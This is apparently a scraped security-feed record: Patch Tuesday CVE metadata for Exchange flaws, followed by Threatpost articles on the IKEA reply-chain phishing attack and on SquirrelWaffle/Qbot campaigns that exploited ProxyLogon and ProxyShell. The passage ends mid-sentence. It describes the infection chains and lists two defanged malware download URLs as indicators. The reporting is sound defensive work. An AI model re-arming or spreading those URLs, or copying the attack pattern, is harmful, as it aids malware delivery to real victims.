"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31183", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31947", "CVE-2021-31961", "CVE-2021-31979", "CVE-2021-31984", "CVE-2021-33740", "CVE-2021-33743", "CVE-2021-33744", "CVE-2021-33745", "CVE-2021-33746", "CVE-2021-33749", "CVE-2021-33750", "CVE-2021-33751", "CVE-2021-33752", "CVE-2021-33753", "CVE-2021-33754", "CVE-2021-33755", "CVE-2021-33756", "CVE-2021-33757", "CVE-2021-33758", "CVE-2021-33759", "CVE-2021-33760", "CVE-2021-33761", "CVE-2021-33763", "CVE-2021-33764", "CVE-2021-33765", "CVE-2021-33766", "CVE-2021-33767", "CVE-2021-33768", "CVE-2021-33771", "CVE-2021-33772", "CVE-2021-33773", "CVE-2021-33774", "CVE-2021-33775", "CVE-2021-33776", "CVE-2021-33777", "CVE-2021-33778", "CVE-2021-33779", "CVE-2021-33780", "CVE-2021-33781", "CVE-2021-33782", "CVE-2021-33783", "CVE-2021-33784", "CVE-2021-33785", "CVE-2021-33786", "CVE-2021-33788", "CVE-2021-34438", "CVE-2021-34439", "CVE-2021-34440", "CVE-2021-34441", "CVE-2021-34442", "CVE-2021-34444", "CVE-2021-34445", "CVE-2021-34446", "CVE-2021-34447", "CVE-2021-34448", "CVE-2021-34449", "CVE-2021-34450", "CVE-2021-34451", "CVE-2021-34452", "CVE-2021-34454", "CVE-2021-34455", "CVE-2021-34456", "CVE-2021-34457", "CVE-2021-34458", "CVE-2021-34459", "CVE-2021-34460", "CVE-2021-34461", "CVE-2021-34462", "CVE-2021-34464", "CVE-2021-34466", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34469", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34474", "CVE-2021-34476", "CVE-2021-34477", "CVE-2021-34479", "CVE-2021-34488", "CVE-2021-34489", "CVE-2021-34490", "CVE-2021-34491", "CVE-2021-34492", "CVE-2021-34493", "CVE-2021-34494", "CVE-2021-34496", "CVE-2021-34497", "CVE-2021-34498", "CVE-2021-34499", "CVE-2021-34500", "CVE-2021-34501", "CVE-2021-34503", "CVE-2021-34504", "CVE-2021-34507", "CVE-2021-34508", "CVE-2021-34509", "CVE-2021-34510", "CVE-2021-34511", "CVE-2021-34512", "CVE-2021-34513", "CVE-2021-34514", "CVE-2021-34516", "CVE-2021-34517", "CVE-2021-34518", "CVE-2021-34519", "CVE-2021-34520", "CVE-2021-34521", "CVE-2021-34522", "CVE-2021-34523", "CVE-2021-34525", "CVE-2021-34527", "CVE-2021-34528", "CVE-2021-34529"], "modified": "2021-07-13T20:56:26", "id": "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "href": "https://blog.rapid7.com/2021/07/13/patch-tuesday-july-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", "type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-23T00:36:02", "description": "Attackers are gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads, researchers say.\n\nWhat\u2019s still under discussion: whether the offensive is delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle is just one piece of malware among several that the campaigns are dropping.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\n## Slipping Under People\u2019s Noses\n\nIn a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) posted on Friday, Trend Micro researchers \u200b\u200bMohamed Fahmy, Sherif Magdy and Abdelrhman Sharshar said that hijacking email replies for malspam is a good way to slip past both people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\n\u201cDelivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail [gateways] will not be able to filter or quarantine any of these internal emails,\u201d they wrote.\n\nThe attacker also didn\u2019t drop, or use, tools for lateral movement after gaining access to the vulnerable Exchange servers, Trend Micro said. Thus, they left no tracks, as \u201cno suspicious network activities will be detected. Additionally, no malware was executed on the Exchange servers that will trigger any alerts before the malicious email is spread across the environment.\u201d\n\n## Middle East Campaign\n\nTrend Micro\u2019s Incident Response team had decided to look into what researchers believe are SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious Exchange server vulnerabilities.\n\nThey shared a screen capture, shown below, that\u2019s representative of the malicious email replies that showed up in all of the user inboxes of one affected network, all sent as legitimate replies to existing threads, all written in English.\n\nThey found that other languages were used in different regions outside of the Middle East attack they examined. Still, in the intrusions they analyzed that were outside of the Middle East, most of the malicious emails were written in English, according to the report.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png>)\n\nMalicious spam received by targets. Source: Trend Micro.\n\n\u201cWith this, the attackers would be able to hijack legitimate email chains and send their malicious spam as replies to the said chains,\u201d the researchers wrote.\n\n## Who\u2019s Behind This?\n\n[Cryptolaemus](<https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/>) researcher [TheAnalyst](<https://twitter.com/ffforward>) disagreed with Trend Micro on its premise that SquirrelWaffle is actually acting as a malware dropper for Qbot or other malwares. Rather, TheAnalyst asserted on Friday that the threat actor is dropping both SquirrelWaffle and Qbot as [discrete payloads](<https://twitter.com/ffforward/status/1461810466720825352>), and the most recent [confirmed SquirrelWaffle drop](<https://twitter.com/ffforward/status/1461810488870944768>) it has seen was actually on Oct. 26.\n\n> it makes it easy for us who tracks them to identify them. A TTP they always comes back to is links to maldocs in stolen reply chains. They are known to deliver a multitude of malware like [#QakBot](<https://twitter.com/hashtag/QakBot?src=hash&ref_src=twsrc%5Etfw>) [#Gozi](<https://twitter.com/hashtag/Gozi?src=hash&ref_src=twsrc%5Etfw>) [#IcedID](<https://twitter.com/hashtag/IcedID?src=hash&ref_src=twsrc%5Etfw>) [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>) and maybe others. >\n> \n> \u2014 TheAnalyst (@ffforward) [November 19, 2021](<https://twitter.com/ffforward/status/1461810468323004417?ref_src=twsrc%5Etfw>)\n\nWith regards to who\u2019s behind the activity, TheAnalyst said that the actor/activity is tracked as tr01/TR (its QakBot affiliate ID)[ TA577](<https://twitter.com/hashtag/TA577?src=hashtag_click>) by Proofpoint and as ChaserLdr by[ Cryptolaemus](<https://twitter.com/Cryptolaemus1>) and that the activity goes back to at least 2020. The actors are easy to track, TheAnalyst said, given small tweaks to their tactics, techniques and procedures (TTPs).\n\nOne such TTP that tr01 favors is adding links to malicious documents included in stolen reply chains, TheAnalyst noted. The threat actor is known to deliver \u201ca multitude of malware,\u201d they said, such as [QakBot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), [Gozi](<https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/>), [IcedID](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), Cobalt Strike and potentially more.\n\n## The Old \u2018Open Me\u2019 Excel Attachment Trick\n\nThe malicious emails carried links (aayomsolutions[.]co[.]in/etiste/quasnam[]-4966787 and aparnashealthfoundation[.]aayom.com/quasisuscipit/totamet[-]4966787) that dropped a .ZIP file containing a malicious Microsoft Excel sheet that downloads and executes a malicious DLL related to the [Qbot](<https://threatpost.com/ta551-tactics-sliver-red-teaming/175651/>) banking trojan.\n\nWhat\u2019s particularly notable, Trend Micro said, is that real account names from the victim\u2019s domain were used as sender and recipient, \u201cwhich raises the chance that a recipient will click the link and open the malicious Microsoft Excel spreadsheets,\u201d according to the report.\n\nAs shown below, the Excel attachment does [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompts targets to choose \u201cEnable Content\u201d to view a protected file.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nTrend Micro offered the chart below, which shows the Excel file infection chain.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg>)\n\nExcel file infection chain. Source: Trend Micro.\n\n## The Exchange Tell-Tales\n\nThe researchers believe that the actors are pulling it off by targeting users who are relying on Microsoft Exchange servers that haven\u2019t yet been patched for the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) vulnerabilities.\n\nTrend Micro found evidence in the IIS logs of three compromised Exchange servers, each compromised in a separate intrusion, all having been exploited via the vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 the same CVEs used in ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) intrusions, according to Trend Micro.\n\nThe IIS log also showed that the threat actor is using a [publicly available](<https://github.com/Jumbo-WJB/Exchange_SSRF>) exploit in its attack. \u201cThis exploit gives a threat actor the ability to get users SID and emails,\u201d the researchers explained. \u201cThey can even search for and download a target\u2019s emails.\u201d\n\nThe researchers shared evidence from the IIS logs, replicated below, that depicts the exploit code.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png>)\n\nExploiting CVE-2021-26855, as demonstrated by the IIS logs. Source: Trend Micro.\n\nMicrosoft fixed the ProxyLogon vulnerabilities in [March](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and the ProxyShell 